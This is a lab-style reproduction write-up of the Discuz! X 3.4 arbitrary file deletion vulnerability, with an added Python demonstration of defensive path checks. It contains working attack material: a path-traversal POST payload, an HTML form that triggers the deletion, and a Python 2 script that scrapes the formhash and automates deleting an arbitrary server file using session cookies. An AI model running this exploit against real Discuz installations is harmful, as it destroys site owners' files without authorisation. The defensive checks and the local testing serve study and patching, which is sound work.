Today the group was discussing the Discuz! X 3.4 arbitrary file deletion vulnerability, so I did some testing of my own and am recording the process here. At the end I attach my own Python script, which automates the file deletion.
For the details of the vulnerability, see https://paper.seebug.org/411/
0X01 Environment Setup
Download Discuz 3.4 from the official website, build it locally with phpStudy, and register an account. Create a new file 111.txt in the site root as the target file to be deleted.
Discuz 3.4 Download Link: http://www.discuz.net/thread-3825961-1-1.html
0X02 Vulnerability Reproduction
1. After logging in to the account, click Settings, which jumps to the profile page; view the page source to get the formhash value.
2. Submit a request to modify the place of birth:
http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base
[POST] birthprovince=../../../111.txt&profilesubmit=1&formhash=9945c60c
3. Construct the following form; after the request is submitted, the file is deleted:
<form action="http://127.0.0.1/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="9945c60c" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>
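The root cause behind steps 2 and 3 is that a free-text profile field is later reused as a file name in the deletefile handler, so a stored "../../../111.txt" is unlinked relative to the upload directory. As an added example (Python 3, not part of the original write-up and not Discuz's own PHP code), the following models the two checks that close this class of bug: reject path separators and ".." in profile text on save, and, when deleting, only accept a bare file name that still resolves inside the upload directory. The profile record, field names, directory layout and file names are constructed for the demonstration.

```python
import os
import re
import shutil
import tempfile

# Constructed sample profile record (field name -> stored value); not Discuz's real schema.
SAMPLE_PROFILE = {
    "birthprovince": "../../../111.txt",  # the traversal payload from the write-up
    "birthcity": "Shenzhen",
    "avatar": "avatar_00123.jpg",         # a server-generated upload name
}

# Free-text profile fields never legitimately contain a path separator, a NUL byte,
# or consist solely of "." / "..".
_BAD_PATH_CHARS = re.compile(r"[\\/\x00]|^\.\.?$")


def is_clean_profile_value(value):
    """Layer 1 (on save): True if the value is plain text with no path components."""
    return _BAD_PATH_CHARS.search(value) is None


def resolve_inside(base_dir, name):
    """Layer 2 (on delete): absolute path of base_dir/name, or None if it escapes base_dir.
    Real paths are compared so symlinks and '..' segments are resolved before the check."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    try:
        return candidate if os.path.commonpath([base, candidate]) == base else None
    except ValueError:  # e.g. different drives on Windows
        return None


def delete_profile_file(profile, field, base_dir):
    """Model of a safe deletefile[field] handler. Returns (deleted, reason)."""
    value = profile.get(field)
    if not value:
        return False, "no stored file for field"
    if os.path.basename(value) != value:
        return False, "stored value is not a bare filename"
    target = resolve_inside(base_dir, value)
    if target is None:
        return False, "path escapes upload directory"
    if not os.path.isfile(target):
        return False, "file does not exist"
    os.unlink(target)
    return True, "deleted"


def demo():
    """Build a throwaway site layout, run both delete attempts, report what happened."""
    root = tempfile.mkdtemp()
    upload_dir = os.path.join(root, "data", "attachment", "profile")
    os.makedirs(upload_dir)
    sentinel = os.path.join(root, "111.txt")        # three levels above upload_dir
    open(sentinel, "w").close()
    open(os.path.join(upload_dir, "avatar_00123.jpg"), "wb").close()
    try:
        return {
            "traversal_blocked": delete_profile_file(SAMPLE_PROFILE, "birthprovince", upload_dir),
            "legit_deleted": delete_profile_file(SAMPLE_PROFILE, "avatar", upload_dir),
            "sentinel_survived": os.path.exists(sentinel),
        }
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for field, value in SAMPLE_PROFILE.items():
        print(field, "clean" if is_clean_profile_value(value) else "REJECTED", repr(value))
    print(demo())
```

Layer 1 alone would have stopped step 2 of the reproduction; layer 2 is what protects the deletion even when a bad value has already reached storage through some other path (an old record, a direct database edit, or a symlink dropped into the upload directory).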
0X03 Python Script
Following the steps above, I wrote a Python script to replace the manual operations; the local test succeeded. I haven't written a script in a long time, so the code is a bit rough, but it gets the job done.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 script (print statement); run with python2.
import requests
import re

"""
discuz! X<=3.4 arbitrary file removal vulnerability
write by Aaron
"""


def get_cookie():
    # Turn the raw "k=v; k=v" cookie string into a dict for requests
    cookies = {}
    for line in raw_cookies.split(';'):
        key, value = line.strip().split('=', 1)
        cookies[key] = value
    return cookies


def get_formhash(url):
    # Fetch the spacecp page and pull the formhash hidden field out of the HTML
    cookies = get_cookie()
    testurl = url + "/home.php?mod=spacecp"
    s = requests.get(testurl, cookies=cookies)
    com = re.compile(r'name="formhash" value="(.*?)"')
    result = com.findall(s.text)
    return result[0]


def del_step1(url, filename):
    # Step 1: store the target path in the birthprovince profile field
    headers = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
    geturl = url + "/home.php?mod=spacecp&ac=profile&op=base"
    formhash = get_formhash(url)
    payload = {'birthprovince': filename, "profilesubmit": 1, "formhash": formhash}
    cookies = get_cookie()
    r = requests.post(geturl, data=payload, headers=headers, cookies=cookies)
    if r.content.find('parent.show_success') > 0:
        print 'STEP1 Success!!!'


def del_step2(url):
    # Step 2: submit the deletefile form; a dummy 1.jpg must exist in the working directory
    geturl = url + "/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"
    heads = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
    formhash = get_formhash(url)
    files = {
        'formhash': (None, formhash),
        'birthprovince': ('1.jpg', open('1.jpg', 'rb'), 'image/jpeg'),
        'profilesubmit': (None, '1'),
    }
    cookies = get_cookie()
    r = requests.post(geturl, files=files, headers=heads, cookies=cookies)
    if r.text.find('parent.show_success') > 0:
        print 'STEP2 Success!!!'


if __name__ == '__main__':
    # The following three parameters need to be modified:
    # 1. set cookie
    raw_cookies = "G2pl_2132_sid=skkqzk; G2pl_2132_saltkey=sz3zk9qk; g2pl_2132_lastvisit=1506772875; G2PL_2132_LASTACT=1506779386%09HOME.PHP%09SPACECP; G2PL_2132_SECCODE=7.AA0407E77FA5C31C1B; G2pl_2132__refer=%252fhome.php%253fmod%253dspacecp%2526ac%253dprofile%2526op%253dbase; g2pl_2132_ulastactivity=d085jjijs5hig3obxlejquw0znypin60oxjv0j6di%2b8afmkq4u6l; G2PL_2132_AUTH=86C5F09HGUAZUGNPSX7PR7OY4MQ2B39NSVIV%2FRFC8VDN1ZJB9PIBVU2FN4JJR9HR7YVNF2VH9RIXRSLWHMZK; g2pl_2132_nofavfid=1; g2pl_2132_sendmail=1; G2pl_2132_noticetitle=1"
    # 2. set the file to delete
    filename = "../../../111.txt"
    # 3. set URL
    url = "http://127.0.0.1"
    del_step1(url, filename)
    del_step2(url)
Discuz! X 3.4 arbitrary file deletion vulnerability reproduction process (Python script included)